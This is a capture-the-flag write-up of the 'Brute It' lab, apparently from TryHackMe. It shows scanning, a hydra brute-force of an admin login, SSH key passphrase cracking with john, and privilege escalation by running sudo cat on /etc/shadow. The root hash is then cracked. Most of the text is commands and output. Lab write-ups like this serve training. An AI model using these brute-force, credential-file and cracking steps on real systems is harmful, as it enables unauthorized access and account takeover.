Brute It
Date: 09 November, 2021
Author: Dhaval Kotak
Room: Brute It
Reconnaissance
nanomite @ zeus in ~/thm/brute_it
⚡️ nmap -A 10.10.87.211 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-09 12:20 IST
Nmap scan report for 10.10.87.211
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
| 256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_ 256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.48 secondsHow many ports are open?
2
What version of SSH is running?
OpenSSH 7.6p1
What version of Apache is running?
2.4.29
Which Linux distribution is running?
Ubuntu
Search for hidden directories on web server.
nanomite @ zeus in ~/thm/brute_it
⚡️ gobuster dir -u http://10.10.87.211 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.87.211
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/09 12:24:13 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.87.211/admin/]
/index.html (Status: 200) [Size: 10918]
/server-status (Status: 403) [Size: 277]
===============================================================
2021/11/09 12:27:18 Finished
===============================================================What is the hidden directory?
/admin
Getting A Shell
We find the username of SSH in a comment while looking at the page source
<!-- Hey john, if you do not remember, the username is admin -->Now lets brute force the login page with hydra
nanomite @ zeus in ~/thm/brute_it
⚡️ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.87.211 http-post-form "/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-09 12:33:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.87.211:80/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid
[80][http-post-form] host: 10.10.87.211 login: admin password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-09 12:33:42Explaination :
-l admin : Specifying the username
-P /usr/share/wordlists/rockyou.txt : Specifying the password dictionary
10.10.87.211 : The Target IP
http-post-form : The type of attack protocol
/admin : The directory of the form
user=^USER^&pass=^PASS^ : The login response from the form
Username or password invalid : The login message if the login failed
What is the user:password of the admin panel?
admin:xavier
Crack the RSA key you found.
nanomite @ zeus in ~/thm/brute_it
⚡️ sudo python3 /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/brute_it
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll (id_rsa)
1g 0:00:00:04 52.40% (ETA: 12:37:06) 0.2487g/s 1888Kp/s 1888Kc/s 1888KC/s hippy3245667
Session abortedWhat is John's RSA Private Key passphrase?
rockinroll
User.txt
nanomite @ zeus in ~/thm/brute_it
⚡️ ssh john@10.10.87.211 -i id_rsa
The authenticity of host '10.10.87.211 (10.10.87.211)' can't be established.
ECDSA key fingerprint is SHA256:6/bVnMDQ46C+aRgroR5KUwqKM6J9jAfSYFMQIOKckug.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.87.211' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Nov 9 07:09:27 UTC 2021
System load: 0.0 Processes: 103
Usage of /: 25.7% of 19.56GB Users logged in: 0
Memory usage: 39% IP address for eth0: 10.10.87.211
Swap usage: 0%
63 packages can be updated.
0 updates are security updates.
Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt
THM{REDACTED}Web flag
You will get the flag when you login with the credentials found by hydra
Privilege Escalation
Find a form to escalate your privileges.
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on bruteit:
(root) NOPASSWD: /bin/catWe can use cat as a root user without any password. So lets cat the /etc/shadow file.
john@bruteit:~$ sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
...
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::Using john to crack the root hash
nanomite @ zeus in ~/thm/brute_it
⚡️ john root-hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
football (root)
1g 0:00:00:04 DONE 2/3 (2021-11-09 12:49) 0.2309g/s 711.3p/s 711.3c/s 711.3C/s 123456..john
Use the "--show" option to display all of the cracked passwords reliably
Session completedWhat is the root's password?
football
root.txt
root@bruteit:/home/john# cd /root
root@bruteit:~# ls
root.txt
root@bruteit:~# cat root.txt
THM{REDACTED}
root@bruteit:~# Last updated